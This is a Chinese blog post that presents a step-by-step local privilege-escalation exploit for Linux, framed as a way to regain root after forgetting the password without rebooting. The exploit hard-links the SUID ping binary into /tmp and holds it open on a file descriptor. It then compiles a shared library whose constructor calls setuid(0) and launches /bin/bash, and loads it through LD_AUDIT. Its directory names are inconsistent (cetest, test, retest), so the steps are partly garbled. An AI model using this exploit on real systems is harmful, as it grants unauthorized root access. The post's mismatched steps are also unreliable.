当你的才华

还撑不起你的野心时

那你就应该静下心来学习

目录

Linux普通用户提权为root

接下来直接看实例

Linux普通用户提权为root

我记得我以前用Linux的时候,忘记root密码是常有的事情,很多时候大家都会选择重启系统,进入单用户模式重置root密码,但在实际运维工作中,就未必能任性重启了。

分享一个不必重启也能切换至root用户的方法给大家。

接下来直接看实例

1. 查看系统环境

cat  /etc/centos-release

2. 创建普通用户进行权限测试

  1. useradd ce
  2. su ce
  3. cat /etc/shadow

3. 开始提权操作

利用ping命令的suid特性,创建一个链接。(ln  /bin/ping   /tmp/cetest/target)

  1. ll /tmp/ -d
  2. cd /tmp/
  3. mkdir cetest //创建目录
  4. ll /bin/ping
  5. ln /bin/ping /tmp/cetest/target //利用ping命令的suid特性,创建一个链接
  6. ll /tmp/test/target
  7. exec 3< /tmp/cetest/target //调用命令
  8. rm -rf /tmp/retest

4. 创建一个C程序

创建vim test.c

  1. void __attribute__((constructor)) init()
  2. {
  3. setuid(0);
  4. system("/bin/bash");
  5. }

5. 编译C程序

  1. gcc -w -fPIC -shared -o /tmp/root test.c
  2. LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3

注:执行程序后,会出现一个报错,但不用管,此时应该顺利切换至root用户了。

我不需要自由,只想背着她的梦

一步步向前走,她给的永远不重

提权学习:Linux普通用户提权为root相关推荐

  1. adore-ng笔记和Linux普通用户提权

    官网:https://github.com/trimpsyw/adore-ng 安装: [root@xuegod63 ~]# unzipadore-ng-master.zip [root@xuegod ...

  2. Windows和linux提权方法,Windows与Linux本地用户提权体验(一)

    无论是Windows系统还是linux系统都是基于权限控制的,其严格的用户等级和权限是系统安全的有力保证.这么严密的用户权限是否不可逾越呢?下面笔者反其道而行之进行Windows及Linux下的提权测 ...

  3. linux suid提权原理,linux关于suid提权笔记

    suid全称是Set owner User ID up on execution.这是Linux给可执行文件的一个属性,上述情况下,普通用户之所以也可以使用ping命令,原因就在我们给ping这个可执 ...

  4. 学习linux之用户-文件-权限操作

    添加用户组 添加 gropuadd 用户组名 修改 groupmod 用户组名 删除 groupdel 用户组名 添加用户 添加 useradd 用户名 设密码 passwd 密码 删除 userde ...

  5. linux 普通用户登陆系统su - root的时候报错su: Authentication failure

    今天登陆服务器的时候,需要提权做一些操作,普通用户su - root的时候提示密码错误 [xtwh@jmw8a2003 ~]$ su Password: su: Authentication fail ...

  6. linux自动更新漏洞,Linux爆本地提权漏洞 请立即更新udev程序

    Linux的udev程序再爆本地提权漏洞,本地用户可以轻易获得root权限,请立即更新udev程序.(2.4内核系统不受影响) 修复方法(修复前请备份重要数据): debian用户请执行apt-get ...

  7. Linux爆本地提权漏洞 请立即更新udev程序

    Linux的udev程序再爆本地提权漏洞,本地用户可以轻易获得root权限,请立即更新udev程序.(2.4内核系统不受影响) 修复方法(修复前请备份重要数据): debian用户请执行apt-get ...

  8. root用户给普通用户提权,禁止root远程登录

    root用户给普通用户提权 让普通用户通过普通账号登录后,拥有root权限 使用root用户操作,创建一个普通用户 [root@kai ~]#useradd k [root@kai ~]# passw ...

  9. 轻松学习LINUX系列教程推出

    本系列多媒体教程已完成的博文: 1.轻松学习Linux之入门篇 http://chenguang.blog.51cto.com/350944/449214 2.轻松学习Linux之本地安装系统 (分区 ...

最新文章

  1. 【引用】在Eclipse中将java Project转换成Dynamic Web Project
  2. 11月29日云栖精选夜读:阿里传奇工程师多隆的程序世界
  3. 【SpringMVC学习07】SpringMVC中的统一异常处理
  4. 注册表改win 7更新服务器,Win7 SP1 修改注册表升级的说明事项
  5. 11、Libgdx的音频
  6. 福师离线 微型计算机与外部,福师《计算机应用基础》离线作业答案
  7. shell的date命令:使用方法,以及小时、分钟的计算
  8. python中连续两个小于号_Python语言描述最大连续子序列和
  9. python对于设计师有什么用-好的IT产品设计师要做到哪些事
  10. zabbix中mysql连不上的排错_zabbix使用排错 - oschina130111的个人空间 - OSCHINA - 中文开源技术交流社区...
  11. 剑指 Offer II 083. 没有重复元素集合的全排列
  12. Linux下查看NVIDIA的GPU使用情况
  13. 教你快速搭建个人网站
  14. 如何获取注册高德Key使用的SHA1值
  15. linux安装系统如何查看硬盘,如何检查Linux系统服务器的硬盘是SSD还是HDD?
  16. Cadence(virtuoso)集成电路设计软件基本操作——库管理
  17. 离散数学 08.02 格的定义
  18. 非线性最小二乘法之Gauss Newton、L-M、Dog-Leg9
  19. 让你提前认识软件开发(46):首先是为人编写程序,其次才是计算机
  20. Oracle 内存(SGA,PGA)详细介绍

热门文章

  1. 【Python】猴子选大王
  2. python[10918:300960] modalSession has been exited prematurely - check for a reentrant call to endMod
  3. 第三章栈和队列-作业题
  4. 百度阿里为何都跑到开曼群岛上注册公司?【转载】
  5. Oracle面试题(概念、定义)
  6. 天天写日记争当文艺青年 2014-5-18
  7. touches和targetTouches的区别
  8. Ubuntu安装驱动
  9. Android四大组件之一Activity的生命周期
  10. 穷人该怎么翻身致富?哪些行业可以让穷人翻身?网友:说的没错。